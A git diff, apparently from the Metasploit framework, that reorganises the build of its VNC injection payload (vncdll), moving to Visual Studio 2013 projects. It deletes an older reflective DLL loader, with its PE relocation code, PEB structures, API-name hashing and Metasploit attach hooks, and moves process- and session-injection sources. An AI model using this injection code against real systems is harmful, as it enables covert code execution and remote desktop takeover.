(even if we load at desired image base) - uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase; - - // uiValueB = the address of the relocation directory - uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ]; - - // check if their are any relocations present - if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size ) - { - // uiValueC is now the first entry (IMAGE_BASE_RELOCATION) - uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress ); - - // and we itterate through all entries... - while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock ) - { - // uiValueA = the VA for this relocation block - uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress ); - - // uiValueB = number of entries in this relocation block - uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC ); - - // uiValueD is now the first entry in the current relocation block - uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION); - - // we itterate through all the entries in the current block... - while( uiValueB-- ) - { - // perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required. - // we dont use a switch statement to avoid the compiler building a jump table - // which would not be very position independent! - if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 ) - *(UINT_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress; - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW ) - *(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress; - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH ) - *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress); - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW ) - *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress); - - // get the next entry in the current relocation block - uiValueD += sizeof( IMAGE_RELOC ); - } - - // get the next entry in the relocation directory - uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock; - } - } - - // STEP 6: process the images exception directory if it has one (PE32+ for x64) -/* - // uiValueB = the address of the relocation directory - uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXCEPTION ]; - // check if their are any exception etries present - if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size ) - { - // get the number of entries - uiValueA = ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size / sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY ); - - // uiValueC is now the first entry (IMAGE_RUNTIME_FUNCTION_ENTRY) - uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress ); - - // itterate through all entries - while( uiValueA-- ) - { - //((IMAGE_RUNTIME_FUNCTION_ENTRY)uiValueC).BeginAddress - - // get the next entry - uiValueC += sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY ); - } - } -*/ - // STEP 7: call our images entry point - - // uiValueA = the VA of our newly loaded DLL/EXE's entry point - uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint ); - - // call our respective entry point, fudging our hInstance value -#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR - // if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter) - ((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter ); -#else - // if we are injecting an DLL via a stub we call DllMain with no parameter - ((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL ); -#endif - - // STEP 8: return our new entry point address so whatever called us can call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH - return uiValueA; -} -//===============================================================================================// -#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN - -// you must implement this function... -extern DWORD DLLEXPORT Init( SOCKET socket ); - -BOOL MetasploitDllAttach( SOCKET socket ) -{ - Init( socket ); - return TRUE; -} - -BOOL MetasploitDllDetach( DWORD dwExitFunc ) -{ - switch( dwExitFunc ) - { - case EXITFUNC_SEH: - SetUnhandledExceptionFilter( NULL ); - break; - case EXITFUNC_THREAD: - ExitThread( 0 ); - break; - case EXITFUNC_PROCESS: - ExitProcess( 0 ); - break; - default: - break; - } - - return TRUE; -} - -BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) -{ - BOOL bReturnValue = TRUE; - switch( dwReason ) - { - case DLL_METASPLOIT_ATTACH: - bReturnValue = MetasploitDllAttach( (SOCKET)lpReserved ); - break; - case DLL_METASPLOIT_DETACH: - bReturnValue = MetasploitDllDetach( (DWORD)lpReserved ); - break; - case DLL_QUERY_HMODULE: - if( lpReserved != NULL ) - *(HMODULE *)lpReserved = hAppInstance; - break; - case DLL_PROCESS_ATTACH: - hAppInstance = hinstDLL; - break; - case DLL_PROCESS_DETACH: - case DLL_THREAD_ATTACH: - case DLL_THREAD_DETACH: - break; - } - return bReturnValue; -} - -#endif -//===============================================================================================// diff --git a/external/source/vncdll/loader/ReflectiveLoader.h b/external/source/vncdll/loader/ReflectiveLoader.h deleted file mode 100644 index 597eb5d457..0000000000 --- a/external/source/vncdll/loader/ReflectiveLoader.h +++ /dev/null @@ -1,197 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. - // -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#ifndef _VNCDLL_LOADER_REFLECTIVELOADER_H -#define _VNCDLL_LOADER_REFLECTIVELOADER_H -//===============================================================================================// -#define WIN32_LEAN_AND_MEAN -#include -#include -#include - -#include "ReflectiveDLLInjection.h" - -#define EXITFUNC_SEH 0xEA320EFE -#define EXITFUNC_THREAD 0x0A2A1DE0 -#define EXITFUNC_PROCESS 0x56A2B5F0 - -typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR ); -typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR ); -typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD ); - -#define KERNEL32DLL_HASH 0x6A4ABC5B -#define LOADLIBRARYA_HASH 0xEC0E4E8E -#define GETPROCADDRESS_HASH 0x7C0DFCAA -#define VIRTUALALLOC_HASH 0x91AFCA54 - -#define HASH_KEY 13 -//===============================================================================================// -#pragma intrinsic( _rotr ) - -__forceinline DWORD ror( DWORD d ) -{ - return _rotr( d, HASH_KEY ); -} - - - -__forceinline DWORD hash( char * c ) -{ - register DWORD h = 0; - do - { - h = ror( h ); - h += *c; - } while( *++c ); - - return h; -} -//===============================================================================================// -typedef struct _UNICODE_STR -{ - USHORT Length; - USHORT MaximumLength; - PWSTR pBuffer; -} UNICODE_STR, *PUNICODE_STR; - -// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY -//__declspec( align(8) ) -typedef struct _LDR_DATA_TABLE_ENTRY -{ - //LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry. - LIST_ENTRY InMemoryOrderModuleList; - LIST_ENTRY InInitializationOrderModuleList; - PVOID DllBase; - PVOID EntryPoint; - ULONG SizeOfImage; - UNICODE_STR FullDllName; - UNICODE_STR BaseDllName; - ULONG Flags; - SHORT LoadCount; - SHORT TlsIndex; - LIST_ENTRY HashTableEntry; - ULONG TimeDateStamp; -} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; - -// WinDbg> dt -v ntdll!_PEB_LDR_DATA -typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes -{ - DWORD dwLength; - DWORD dwInitialized; - LPVOID lpSsHandle; - LIST_ENTRY InLoadOrderModuleList; - LIST_ENTRY InMemoryOrderModuleList; - LIST_ENTRY InInitializationOrderModuleList; - LPVOID lpEntryInProgress; -} PEB_LDR_DATA, * PPEB_LDR_DATA; - -// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK -typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes -{ - struct _PEB_FREE_BLOCK * pNext; - DWORD dwSize; -} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK; - -// struct _PEB is defined in Winternl.h but it is incomplete -// WinDbg> dt -v ntdll!_PEB -typedef struct __PEB // 65 elements, 0x210 bytes -{ - BYTE bInheritedAddressSpace; - BYTE bReadImageFileExecOptions; - BYTE bBeingDebugged; - BYTE bSpareBool; - LPVOID lpMutant; - LPVOID lpImageBaseAddress; - PPEB_LDR_DATA pLdr; - LPVOID lpProcessParameters; - LPVOID lpSubSystemData; - LPVOID lpProcessHeap; - PRTL_CRITICAL_SECTION pFastPebLock; - LPVOID lpFastPebLockRoutine; - LPVOID lpFastPebUnlockRoutine; - DWORD dwEnvironmentUpdateCount; - LPVOID lpKernelCallbackTable; - DWORD dwSystemReserved; - DWORD dwAtlThunkSListPtr32; - PPEB_FREE_BLOCK pFreeList; - DWORD dwTlsExpansionCounter; - LPVOID lpTlsBitmap; - DWORD dwTlsBitmapBits[2]; - LPVOID lpReadOnlySharedMemoryBase; - LPVOID lpReadOnlySharedMemoryHeap; - LPVOID lpReadOnlyStaticServerData; - LPVOID lpAnsiCodePageData; - LPVOID lpOemCodePageData; - LPVOID lpUnicodeCaseTableData; - DWORD dwNumberOfProcessors; - DWORD dwNtGlobalFlag; - LARGE_INTEGER liCriticalSectionTimeout; - DWORD dwHeapSegmentReserve; - DWORD dwHeapSegmentCommit; - DWORD dwHeapDeCommitTotalFreeThreshold; - DWORD dwHeapDeCommitFreeBlockThreshold; - DWORD dwNumberOfHeaps; - DWORD dwMaximumNumberOfHeaps; - LPVOID lpProcessHeaps; - LPVOID lpGdiSharedHandleTable; - LPVOID lpProcessStarterHelper; - DWORD dwGdiDCAttributeList; - LPVOID lpLoaderLock; - DWORD dwOSMajorVersion; - DWORD dwOSMinorVersion; - WORD wOSBuildNumber; - WORD wOSCSDVersion; - DWORD dwOSPlatformId; - DWORD dwImageSubsystem; - DWORD dwImageSubsystemMajorVersion; - DWORD dwImageSubsystemMinorVersion; - DWORD dwImageProcessAffinityMask; - DWORD dwGdiHandleBuffer[34]; - LPVOID lpPostProcessInitRoutine; - LPVOID lpTlsExpansionBitmap; - DWORD dwTlsExpansionBitmapBits[32]; - DWORD dwSessionId; - ULARGE_INTEGER liAppCompatFlags; - ULARGE_INTEGER liAppCompatFlagsUser; - LPVOID lppShimData; - LPVOID lpAppCompatInfo; - UNICODE_STR usCSDVersion; - LPVOID lpActivationContextData; - LPVOID lpProcessAssemblyStorageMap; - LPVOID lpSystemDefaultActivationContextData; - LPVOID lpSystemAssemblyStorageMap; - DWORD dwMinimumStackCommit; -} _PEB, * _PPEB; - -typedef struct -{ - WORD offset:12; - WORD type:4; -} IMAGE_RELOC, *PIMAGE_RELOC; -//===============================================================================================// -#endif -//===============================================================================================// diff --git a/external/source/vncdll/loader/loader.rc b/external/source/vncdll/loader/loader.rc deleted file mode 100644 index 678e8d5576..0000000000 --- a/external/source/vncdll/loader/loader.rc +++ /dev/null @@ -1,6 +0,0 @@ - -#ifdef _X64_ -IDR_VNC_DLL IMG DISCARDABLE "../winvnc/x64/release/vnc.x64.dll" -#else -IDR_VNC_DLL IMG DISCARDABLE "../winvnc/release/vnc.dll" -#endif diff --git a/external/source/vncdll/loader/loader.vcproj b/external/source/vncdll/loader/loader.vcproj deleted file mode 100644 index 79c60dcb46..0000000000 --- a/external/source/vncdll/loader/loader.vcproj +++ /dev/null @@ -1,437 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/external/source/vncdll/make.bat b/external/source/vncdll/make.bat new file mode 100755 index 0000000000..fee7434034 --- /dev/null +++ b/external/source/vncdll/make.bat @@ -0,0 +1,32 @@ +@ECHO OFF +IF "%VCINSTALLDIR%" == "" GOTO NEED_VS + +IF "%1"=="x86" GOTO BUILD_X86 +IF "%1"=="X64" GOTO BUILD_X64 + +ECHO "Building VNCDLL x64 and x86 (Release)" +SET PLAT=all +GOTO RUN + +:BUILD_X86 +ECHO "Building VNCDLL x86 (Release)" +SET PLAT=x86 +GOTO RUN + +:BUILD_X64 +ECHO "Building VNCDLL x64 (Release)" +SET PLAT=x64 +GOTO RUN + +:RUN +PUSHD workspace +msbuild.exe make.msbuild /target:%PLAT% +POPD + +GOTO :END + +:NEED_VS +ECHO "This command must be executed from within a Visual Studio Command prompt." +ECHO "This can be found under Microsoft Visual Studio 2013 -> Visual Studio Tools" + +:END diff --git a/external/source/vncdll/make.msbuild b/external/source/vncdll/make.msbuild new file mode 100755 index 0000000000..ae4ea05084 --- /dev/null +++ b/external/source/vncdll/make.msbuild @@ -0,0 +1,19 @@ + + + + .\vncdll.sln + + + + + + + + + + + + + + + diff --git a/external/source/vncdll/output/vncdll.dll b/external/source/vncdll/output/vncdll.dll deleted file mode 100644 index f0bd4da8a5..0000000000 Binary files a/external/source/vncdll/output/vncdll.dll and /dev/null differ diff --git a/external/source/vncdll/output/vncdll.x64.dll b/external/source/vncdll/output/vncdll.x64.dll deleted file mode 100644 index c8d1ff48d8..0000000000 Binary files a/external/source/vncdll/output/vncdll.x64.dll and /dev/null differ diff --git a/external/source/vncdll/winvnc/vncdll.sln b/external/source/vncdll/vncdll.sln old mode 100644 new mode 100755 similarity index 66% rename from external/source/vncdll/winvnc/vncdll.sln rename to external/source/vncdll/vncdll.sln index 71cfe625d9..613b2fcbab --- a/external/source/vncdll/winvnc/vncdll.sln +++ b/external/source/vncdll/vncdll.sln @@ -1,11 +1,10 @@ -Microsoft Visual Studio Solution File, Format Version 10.00 -# Visual C++ Express 2008 -Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "winvnc", "WinVNC.vcproj", "{EA6A09AC-04BB-423D-8842-CA48DF901058}" +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio 2013 +VisualStudioVersion = 12.0.21005.1 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "winvnc", "winvnc\WinVNC.vcxproj", "{EA6A09AC-04BB-423D-8842-CA48DF901058}" EndProject -Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "loader", "..\loader\loader.vcproj", "{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}" - ProjectSection(ProjectDependencies) = postProject - {EA6A09AC-04BB-423D-8842-CA48DF901058} = {EA6A09AC-04BB-423D-8842-CA48DF901058} - EndProjectSection +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "vncdll", "vncdll\vncdll.vcxproj", "{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}" EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution @@ -15,19 +14,22 @@ Global Release|x64 = Release|x64 EndGlobalSection GlobalSection(ProjectConfigurationPlatforms) = postSolution + {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.ActiveCfg = Debug|Win32 + {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.Build.0 = Debug|Win32 + {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|x64.ActiveCfg = Debug|x64 + {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|x64.Build.0 = Debug|x64 + {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.ActiveCfg = Release|Win32 + {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.Build.0 = Release|Win32 + {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|x64.ActiveCfg = Release|x64 + {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|x64.Build.0 = Release|x64 {EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|Win32.ActiveCfg = Debug|Win32 {EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|Win32.Build.0 = Debug|Win32 - {EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|x64.ActiveCfg = Debug|Win32 + {EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|x64.ActiveCfg = Debug|x64 + {EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|x64.Build.0 = Debug|x64 {EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|Win32.ActiveCfg = Release|Win32 {EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|Win32.Build.0 = Release|Win32 {EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|x64.ActiveCfg = Release|x64 {EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|x64.Build.0 = Release|x64 - {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.ActiveCfg = Debug|Win32 - {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.Build.0 = Debug|Win32 - {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|x64.ActiveCfg = Debug|Win32 - {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.ActiveCfg = Release|Win32 - {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.Build.0 = Release|Win32 - {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|x64.ActiveCfg = Release|x64 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/external/source/vncdll/loader/LICENSE.txt b/external/source/vncdll/vncdll/LICENSE.txt similarity index 100% rename from external/source/vncdll/loader/LICENSE.txt rename to external/source/vncdll/vncdll/LICENSE.txt diff --git a/external/source/vncdll/loader/context.c b/external/source/vncdll/vncdll/context.c old mode 100644 new mode 100755 similarity index 96% rename from external/source/vncdll/loader/context.c rename to external/source/vncdll/vncdll/context.c index e617aa0c15..3d270c14bb --- a/external/source/vncdll/loader/context.c +++ b/external/source/vncdll/vncdll/context.c @@ -76,7 +76,7 @@ DWORD WINAPI context_message_thread( LPVOID lpParameter ) { do { - _snprintf( cNamedPipe, MAX_PATH, "\\\\.\\pipe\\%08X", AgentContext.dwPipeName ); + _snprintf_s( cNamedPipe, MAX_PATH, MAX_PATH - 1, "\\\\.\\pipe\\%08X", AgentContext.dwPipeName ); dprintf("[LOADER] loader_message_thread. cNamedPipe=%s", cNamedPipe ); diff --git a/external/source/vncdll/loader/context.h b/external/source/vncdll/vncdll/context.h similarity index 100% rename from external/source/vncdll/loader/context.h rename to external/source/vncdll/vncdll/context.h diff --git a/external/source/vncdll/loader/inject.c b/external/source/vncdll/vncdll/inject.c old mode 100644 new mode 100755 similarity index 97% rename from external/source/vncdll/loader/inject.c rename to external/source/vncdll/vncdll/inject.c index d0386434dc..3414584dc6 --- a/external/source/vncdll/loader/inject.c +++ b/external/source/vncdll/vncdll/inject.c @@ -1,7 +1,7 @@ #include "loader.h" #include "ps.h" #include "inject.h" -#include "LoadLibraryR.h" +#include "../../ReflectiveDLLInjection/inject/src/LoadLibraryR.h" #include // Simple trick to get the current meterpreters arch diff --git a/external/source/vncdll/loader/inject.h b/external/source/vncdll/vncdll/inject.h similarity index 100% rename from external/source/vncdll/loader/inject.h rename to external/source/vncdll/vncdll/inject.h diff --git a/external/source/vncdll/loader/loader.c b/external/source/vncdll/vncdll/loader.c old mode 100644 new mode 100755 similarity index 95% rename from external/source/vncdll/loader/loader.c rename to external/source/vncdll/vncdll/loader.c index c7d7d2626e..251f548066 --- a/external/source/vncdll/loader/loader.c +++ b/external/source/vncdll/vncdll/loader.c @@ -5,11 +5,12 @@ #include "ps.h" #include "session.h" #include "inject.h" -#include "ReflectiveLoader.h" #define VNCFLAG_DISABLECOURTESYSHELL 1 #define VNCFLAG_DISABLESESSIONTRACKING 2 +#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" + /* * The HINSTANCE of this injected dll. */ @@ -173,7 +174,7 @@ DWORD loader_inject_pre( DWORD dwPid, HANDLE hProcess, char * cpCommandLine ) hAgentProcess = hProcess; - _snprintf( cpCommandLine, COMMANDLINE_LENGTH, "/v /c:0x%08X", lpMemory ); + _snprintf_s( cpCommandLine, COMMANDLINE_LENGTH, COMMANDLINE_LENGTH - 1, "/v /c:0x%08p", lpMemory ); } while( 0 ); diff --git a/external/source/vncdll/loader/loader.h b/external/source/vncdll/vncdll/loader.h similarity index 100% rename from external/source/vncdll/loader/loader.h rename to external/source/vncdll/vncdll/loader.h diff --git a/external/source/vncdll/vncdll/loader.rc b/external/source/vncdll/vncdll/loader.rc new file mode 100755 index 0000000000..d4f53181d0 --- /dev/null +++ b/external/source/vncdll/vncdll/loader.rc @@ -0,0 +1,18 @@ + +#ifdef _X64_ + +#ifdef _DEBUG +IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Debug\\x64\\winvnc.x64.dll" +#else +IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Release\\x64\\winvnc.x64.dll" +#endif + +#else + +#ifdef _DEBUG +IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Debug\\Win32\\winvnc.x86.dll" +#else +IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Release\\Win32\\winvnc.x86.dll" +#endif + +#endif \ No newline at end of file diff --git a/external/source/vncdll/loader/ps.c b/external/source/vncdll/vncdll/ps.c similarity index 100% rename from external/source/vncdll/loader/ps.c rename to external/source/vncdll/vncdll/ps.c diff --git a/external/source/vncdll/loader/ps.h b/external/source/vncdll/vncdll/ps.h similarity index 100% rename from external/source/vncdll/loader/ps.h rename to external/source/vncdll/vncdll/ps.h diff --git a/external/source/vncdll/loader/session.c b/external/source/vncdll/vncdll/session.c old mode 100644 new mode 100755 similarity index 93% rename from external/source/vncdll/loader/session.c rename to external/source/vncdll/vncdll/session.c index 93d60aa471..c95cf7c11f --- a/external/source/vncdll/loader/session.c +++ b/external/source/vncdll/vncdll/session.c @@ -18,7 +18,7 @@ DWORD session_id( DWORD dwProcessId ) { if( !pProcessIdToSessionId ) { - hKernel = LoadLibrary( "kernel32.dll" ); + hKernel = LoadLibraryA( "kernel32.dll" ); if( hKernel ) pProcessIdToSessionId = (PROCESSIDTOSESSIONID)GetProcAddress( hKernel, "ProcessIdToSessionId" ); } @@ -53,7 +53,7 @@ DWORD session_activeid() { if( !pWTSGetActiveConsoleSessionId ) { - hKernel = LoadLibrary( "kernel32.dll" ); + hKernel = LoadLibraryA( "kernel32.dll" ); if( hKernel ) pWTSGetActiveConsoleSessionId = (WTSGETACTIVECONSOLESESSIONID)GetProcAddress( hKernel, "WTSGetActiveConsoleSessionId" ); } @@ -141,7 +141,7 @@ DWORD session_inject( DWORD dwSessionId, DLL_BUFFER * pDllBuffer ) CloseHandle( hToken ); } - hKernel = LoadLibrary( "kernel32" ); + hKernel = LoadLibraryA( "kernel32" ); if( !hKernel ) break; diff --git a/external/source/vncdll/loader/session.h b/external/source/vncdll/vncdll/session.h similarity index 100% rename from external/source/vncdll/loader/session.h rename to external/source/vncdll/vncdll/session.h diff --git a/external/source/vncdll/vncdll/vncdll.vcxproj b/external/source/vncdll/vncdll/vncdll.vcxproj new file mode 100755 index 0000000000..d97cda4a84 --- /dev/null +++ b/external/source/vncdll/vncdll/vncdll.vcxproj @@ -0,0 +1,245 @@ + + + + + Debug + Win32 + + + Debug + x64 + + + Release + Win32 + + + Release + x64 + + + + {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD} + vncdll + Win32Proj + + + + DynamicLibrary + v120_xp + false + MultiByte + true + + + DynamicLibrary + v120_xp + MultiByte + + + DynamicLibrary + v120_xp + false + MultiByte + true + + + DynamicLibrary + v120_xp + MultiByte + + + + + + + + + + + + + + + + + + + <_ProjectFileVersion>12.0.21005.1 + + + $(ProjectDir)$(Configuration)\$(Platform)\ + $(ProjectDir)$(Configuration)\$(Platform)\ + true + $(ProjectName).$(PlatformShortName) + + + $(ProjectDir)$(Configuration)\$(Platform)\ + $(ProjectDir)$(Configuration)\$(Platform)\ + true + $(ProjectName).$(PlatformShortName) + + + $(ProjectDir)$(Configuration)\$(Platform)\ + $(ProjectDir)$(Configuration)\$(Platform)\ + false + false + $(ProjectName).$(PlatformShortName) + + + $(ProjectDir)$(Configuration)\$(Platform)\ + $(ProjectDir)$(Configuration)\$(Platform)\ + false + false + $(ProjectName).$(PlatformShortName) + + + + Disabled + WIN32;WIN_X86;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions) + ..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories) + true + EnableFastChecks + MultiThreadedDebugDLL + + Level3 + EditAndContinue + + + true + Windows + MachineX86 + Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies) + + + _DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions) + + + editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +exit 0 + + + + + X64 + + + Disabled + WIN32;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions) + ..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories) + true + EnableFastChecks + MultiThreadedDebugDLL + + Level3 + ProgramDatabase + + + true + Windows + MachineX64 + Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies) + + + _X64_;_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions) + + + editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" > NUL +exit 0 + + + + + MaxSpeed + true + WIN32;WIN_X86;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions) + ..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories) + MultiThreaded + true + + Level3 + ProgramDatabase + CompileAsC + + + _USING_V110_SDK71_;%(PreprocessorDefinitions) + + + Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies) + $(OutDir)$(TargetName)$(TargetExt) + false + Windows + true + true + false + false + MachineX86 + + + editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\data\" + + + + + X64 + + + MaxSpeed + true + WIN32;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions) + ..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories) + MultiThreaded + true + + Level3 + ProgramDatabase + CompileAsC + + + _X64_;_USING_V110_SDK71_;%(PreprocessorDefinitions) + + + Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies) + $(OutDir)$(TargetName)$(TargetExt) + false + Windows + true + true + false + false + MachineX64 + + + editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" > NUL +copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\data\" + + + + + + + + + + + + + + + + + + + + + + + {ea6a09ac-04bb-423d-8842-ca48df901058} + false + + + + + + \ No newline at end of file diff --git a/external/source/vncdll/vncdll/vncdll.vcxproj.filters b/external/source/vncdll/vncdll/vncdll.vcxproj.filters new file mode 100755 index 0000000000..b4f067d299 --- /dev/null +++ b/external/source/vncdll/vncdll/vncdll.vcxproj.filters @@ -0,0 +1,65 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx + + + 